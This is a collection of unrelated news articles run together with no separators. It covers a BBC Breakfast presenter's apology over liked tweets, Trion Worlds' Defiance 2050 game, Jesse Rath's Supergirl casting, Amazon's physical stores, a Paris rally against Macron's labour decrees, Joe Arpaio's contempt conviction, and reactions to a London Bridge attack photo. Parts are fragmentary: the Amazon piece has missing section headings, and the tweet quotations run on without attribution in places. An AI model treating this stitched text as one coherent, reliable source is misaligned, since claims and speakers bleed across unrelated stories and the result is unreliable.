The BBC Breakfast host apologised yesterday for liking “offensive” tweets about a Government minister’s video call backdrop featuring the Union flag. While interviewing Housing Secretary Robert Jenrick, Ms Munchetty and co-host Charlie Stayt laughed after commenting on the flag. Mr Stayt said: “I think your flag is not up to standard size, Government interview measurements. “I think it’s just a little bit small, but that’s your department really. It’s just a thought.” Ms Munchetty then apologised on Twitter for liking tweets referencing the interview that she said were “offensive”. She said: “I ‘liked’ tweets today that were offensive in nature about the use of the British flag as a backdrop in a Government interview this morning. I have since removed these ‘likes’. “This does not represent the views of me or the BBC. I apologise for any offence taken.” Ms Munchetty previously discussed BBC impartiality following comments she made about Donald Trump in 2019. The US President at the time was accused of racism after he told a number of female Democratic Party candidates to “go back” where they came from. Nancy Pelosi labelled the comments “xenophobic”, with Kamala Harris also saying: “Let’s call the President’s racist attack exactly what it is: un-American.” Ms Munchetty condemned Mr Trump’s comments on BBC Breakfast at the time, and was originally found to have breached editorial conduct rules. However, the decision was eventually reversed. Discussing the row a year later, Ms Munchetty said newsreaders are “not robots” and “not idiots”. She said: “I sit on that sofa as a woman, as a person of colour from an ethnic minority who is not a robot. READ MORE: Andrew Neil’s fury at BBC: ‘Unhappy with how they treated me’ “We’re talking about Black Lives Matter now, we’re talking about George Floyd. We are not robots. We are not there to simply, blankly, read the news. That isn’t our job. “We are judging what viewers need to know and we’re informing them as neutrally but with insight as much as we can. We are impartial but we’re not idiots.” Following her comments on the Women’s Prize for Fiction podcast, she echoed the sentiments in an interview with British Vogue. She continued: “One of the balancing acts of being a Breakfast presenter is being comfortable enough to show who you are and your personality. “You have to show empathy. You cannot sit there and be a robot on that sofa. “And I do stand by it. It is not OK to use offensive language, or to skirt around offensive language, to make a point or get attention.” DON’T MISS Ms Munchetty opened up about racist abuse she and her family had received in the past. She said: “My parents have always been absolutely professional and caring as nurses. They came to a country that wasn’t always welcoming to people of colour, to be the best they could be. And they were told to go home all the time.” But Ms Munchetty said “very positive things” had come out of the Trump incident. She concluded: “What it has done is raise an uncomfortable conversation that needed to be raised.” Asked whether the BBC was institutionally racist, Ms Munchetty said: “I’m going to turn this on its head: find me a large organisation, and find me an employee from a minority group who feels they are able to bring their true self to work today. “I don’t think you’ll be able to.”

Defiance was one of the most ambitious online games conceived by a startup. Trion Worlds launched the game to mixed reviews in 2013, and the SyFy television network aired a Defiance TV show in tandem with the game for three seasons. SyFy canceled the show in 2015, but the online shooter lived on.
Today, Trion Worlds announced it will create a new experience, dubbed Defiance 2050, to reimagine the shooter. It will launch on PC, PlayStation 4, and Xbox One this summer. It will take the story and gameplay of the original and give it a major overhaul.
In the new story, 20 years have passed since the catastrophic Arkfall event left millions of alien Votans dead and Earth terraformed into a nearly unrecognizable postapocalyptic landscape. In Defiance 2050’s version of San Francisco, players explore an open world, where they can fight in skirmishes and take on story-driven missions. The big battles were always one of the most touted features of the original, where players had to band together to destroy huge creatures.
Above: Defiance 2050 has those same crabby monsters.
In the Defiance 2050, players will again engage in massive cooperative battles with their friends, use hundreds of weapons and skills, and take on huge alien threats as they explore this transformed future Earth.
Defiance 2050 re-creates the original environment, and it will use graphics that fit the PlayStation 4 and Xbox One. It will have updated textures and other art assets, along with other improvements that come from what Trion has learned about making games since 2013.
“Defiance 2050 has been created with the original game’s community in mind,” said Matt Pettit, the producer of Defiance 2050, in a statement. “The team has been listening to feedback and taking some helpful cues from fans to really create the Defiance experience that people have wanted for a long time. Defiance 2050 marks a shift for the game that goes beyond the change from the year 2046 to 2050, and we are absolutely thrilled to hear what people think of it.”
Prior to launch, Defiance 2050 will be entering a closed beta period that interested players can sign up for and receive more information on in the coming months. The team will take player feedback into account before the launch.
Trion Worlds has other successful games such as ArcheAge, Atlas Reactor, Rift, and Trove.

Talk about a smart casting move.
The CW’s Supergirl has cast Defiance alum Jesse Rath in the recurring role of Brainiac 5, TVLine has learned exclusively.
Half computer, half organic life and boasting a 12-level intellect, Brainiac 5 is a member of the Legion of Super-Heroes who travels to National City from the 31st Century to help Supergirl and the DEO battle Reign, the villain that L-Corp CEO Samantha Arias (played by Odette Annable) is on track to becoming.
Of course, Brainiac 5 in DC Comics lore has at times been more than a colleague of Supergirl’s. And as co-showrunner Andrew Kreisberg previously told TVLine of the character’s arrival, “Someone down the road will like Kara a lot, which will be a lot of fun.”
Rath will first appear in Season 3, Episode 10 — which is titled “Legion of Super-Heroes.” (Reminder: In the comics, Mon-El aka Lar Gand/Valor also is known to have an affiliation with the Legion.)
On Smallville, Buffy alum James Marsters portrayed Brainiac 5 in the Season 10 episode “Homecoming.”
In addition to his run on Defiance, where he played Castithan crime family member Alak Tarr, Rath’s previous TV credits include No Tomorrow, Being Human and 18 to Life. He was also featured in the online miniseries Assassin’s Creed: Lineage, a prequel to the bestselling videogame Assassin’s Creed II. A diehard comic book fan, Rath is also one of the creators and stars of the popular web series Fans.

Amazon has become synonymous with online shopping.
But the online giant is increasingly moving into the physical world, opening spaces in malls, shopping districts, and even local strip malls. It’s a move that signals the company’s ambitions are larger than ecommerce.
One reason that may be, an anonymous source told CNBC, is that Amazon is seeing online sales go up in areas that have physical stores. Brick-and-mortar stores increase customer awareness of the brand, and it’s extra fuel for the Amazon engine.
Here are all the ways that Amazon has expanded into the physical world so far.

Amazon’s acquisition of natural foods store Whole Foods is the big one to mention here.
Whole Foods was already a national chain with more than 450 stores, but with the power of Amazon behind it, it has the potential to be something even larger. Changes like selling the Amazon Echo, installing Amazon Lockers, and lowering prices are all already under way.
Kohl’s
Kohl’s will start accepting Amazon returns at 82 stores in Chicago and Los Angeles in October.
The returns will be free, and they won’t need to be packaged before drop-off.
Ten stores will also feature an “Amazon smart home experience” with a separate section selling Amazon devices like the Echo.

Amazon also has a line of bookstores for college campuses, which it operates in conjunction with each school.
In addition to offering books and supplies for students, it also has a special Amazon Locker device service called Amazon Instant, where attendants stuff items from the store into the slots, ready to be picked up by customers in a way that’s similar to a vending machine.

Demonstrators have gathered in the streets of the French capital to protest changes to the labor code pushed through by President Macron. The far-left Jean-Luc Melenchon, Macron’s staunch critic, called a rally against a “social coup d’etat.”
“We won’t let them empty the poor’s pockets to feed the rich!” urged the leaflets handed by La France Insoumise (France Unbowed) party before the demo kicked off. The leader, Melenchon, called on the French youth, retirees and workers to join the Saturday rally, scheduled for 2pm local time at the Place de la Bastille .
The party organized transfers to bring protesters from across France, chartering nearly 130 buses.
As the event inched closer, people could be seen waiting in anticipation, holding banners and flags of the France Unbowed party.
A number of left-wing organizations joined Melenchon’s call to rally, with alter-globalist association Attac, Socialist presidential candidate Benoite Hamon’s July 1 Movement and the Lambertist Trotskyists, as Le Monde reported.
Delegations from the French Communist Party, as well as the Greens are also expected to show up.
“We want to strike a blow and block Macron,” France Unbowed’s Eric Coquerel said.
On Friday, President Macron signed sweeping labor decrees into law, overhauling large parts of the 3,300-page code. The changes will give smaller companies more freedom to negotiate conditions with employees, reducing the role of unions in talks. The reforms will also enable companies to discuss issues, such as 13th month salary, loyalty bonuses, sick days and maternity leave directly with staff.
In addition, the changes will also set a cap on the pay-outs awarded to workers found to have been unfairly sacked at industrial tribunals. This is a condition that the previous government of Francois Hollande was forced to abandon. The changes signed by Macron are due to take effect next year.
Ahead of the approval thousands of protesters throughout France flocked to the streets, marching against what some placards called “the law for the bosses.” Staged by trade unions, including the powerful CGT, the Thursday rallies saw a relatively modest turnout compared to marches last week, when some 225,000 people turned out.

PHOENIX (AP) — The political defiance that made Joe Arpaio popular and seemingly untouchable as metro Phoenix’s sheriff of 24 years ultimately led to his downfall as he was convicted of a crime for ignoring a U.S. court order to stop traffic patrols that targeted immigrants.
The TV interviews and news releases that the media-savvy lawman used over the years to promote his immigration crackdowns came back to bite him. The judge who found him guilty of misdemeanor contempt of court cited comments Arpaio made about keeping up the patrols, even though he knew he was not allowed.
“Not only did defendant abdicate responsibility, he announced to the world and to his subordinates that he was going to continue business as usual no matter who said otherwise,” U.S. District Judge Susan Bolton wrote.
The verdict Monday marked a final rebuke for a politician who once drew strong support from such crackdowns but was booted from office last year as voters got frustrated with his deepening legal troubles and headline-grabbing tactics, such as jailing inmates in tents during triple-degree summer heat and making them wear pink underwear.
Arpaio told The Associated Press that he didn’t have an immediate comment on the verdict, but his attorneys said they will appeal. The 85-year-old is set to be sentenced Oct. 5 and could face up to six months in jail, but attorneys who have followed the case doubt someone his age would be incarcerated.
Critics said the verdict that followed a five-day trial in Phoenix was a long-awaited comeuppance for a lawman who had managed to escape accountability through much of his six terms.

Lydia Guzman, a Latino civil rights advocate and longtime Arpaio critic, said the sheriff was partly responsible for Arizona’s reputation as a place that’s intolerant of immigrants.
“He is the one who led the rally against immigrants, and the legislators followed suit,” Guzman said, noting Arizona’s landmark 2010 immigration law. “I hope a lot of this is erased and that Arizona can go back to being a normal state. I don’t know when that will be.”
Prosecutors say Arpaio ignored the 2011 order from a different U.S. judge so he could promote his immigration enforcement efforts in an effort to boost his 2012 re-election campaign. That judge later ruled the traffic patrols racially profiled Latinos.
The sheriff had acknowledged prolonging his patrols for nearly a year and a half but insisted it was not intentional. He also blamed one of his former attorneys in the racial profiling case for not properly explaining the importance of the court order.
Bolton rejected all Arpaio’s key arguments, saying the attorney had clearly informed him of the order and that a top aide also read part of it aloud to him during a staff meeting.
His lawyers contend the former sheriff’s fate should have been decided by a jury, not a judge. They also said Bolton violated Arpaio’s rights by not reading the decision in court.
“Her verdict is contrary to what every single witness testified in the case,” his lawyers said in a statement. “Arpaio believes that a jury would have found in his favor, and that it will.”
His defense had focused on what his attorneys said were weaknesses in the court order that failed to acknowledge times when deputies would detain immigrants and later hand them over to federal authorities.
Unlike other local police leaders who left immigration enforcement to U.S. authorities, Arpaio made hundreds of arrests in traffic patrols that sought out immigrants and business raids in which his officers targeted immigrants who used fraudulent IDs to get jobs.

The efforts are similar to local immigration enforcement that President Donald Trump has advocated. To build his highly touted deportation force, Trump is reviving a long-standing program that deputizes local officers to enforce federal immigration law.
Arpaio’s immigration powers were eventually stripped away by the courts and federal government.
The contempt-of-court case marked the first time federal authorities had prosecuted Arpaio on a criminal charge, though his office had been the subject of past investigations.
Federal authorities had looked into Arpaio’s misspending of $ 100 million in jail funds and his criminal investigations of political enemies. Neither investigation led to prosecution of the sheriff or his employees.
Arpaio’s criminal charges are believed to have contributed heavily to his crushing defeat in November to Paul Penzone, a little-known retired Phoenix police sergeant.
He was ousted in the same election that sent Trump to the White House. Trump used some of the same immigration rhetoric that helped make Arpaio a national figure in the debate over the U.S.-Mexico border.
Cecillia Wang, an attorney who helped press the racial profiling case against Arpaio, said his fate is a cautionary tale for police bosses who want to get into immigration enforcement.
“What was a lark to him in going after undocumented immigrants was terrible, not only for the people he hurt but also for his own agency and his career,” Wang said. “His career will go down as ending with his conviction.”

Amid the chaos of the operation to stop three armed terrorists near London Bridge, which ended in a hail of bullets and seven people dying, one man seemed to exemplify the city’s defiant spirit and the famous British “Keep Calm and Carry On” attitude.
Given the horrific nature of the attack, opinion has understandably been divided online, in response to the image.
Some defended the man’s decision not to abandon his pint, highlighting that it encapsulated the British sense of humor, especially in times of crisis.
The people hating on this guy are blatantly NOT British. We find this a) funny and b) admirable.
— Sgt.Big_Bubbles! (@Big_Bubbaloola) June 4, 2017
Nobody is ignoring the spilt blood but humour gives us the strength to fight for those who were hurt and killed. It’s just how we do it here
— Sarah Hallahan (@SarahHallahan1) June 4, 2017
It’s London bridge ffs he’s paid £5.50 for that pint

Reacting to hate with humor. Well done Brits.
Mourn and remember the victims, but don’t change.
— Kristof Strijkers (@strijkers) June 4, 2017
Some were more sombre in their assessment of the situation, but were definitely in the minority.
How dare you make light of this horrific incident and make judgements about the innocent people involved. Shame on you.
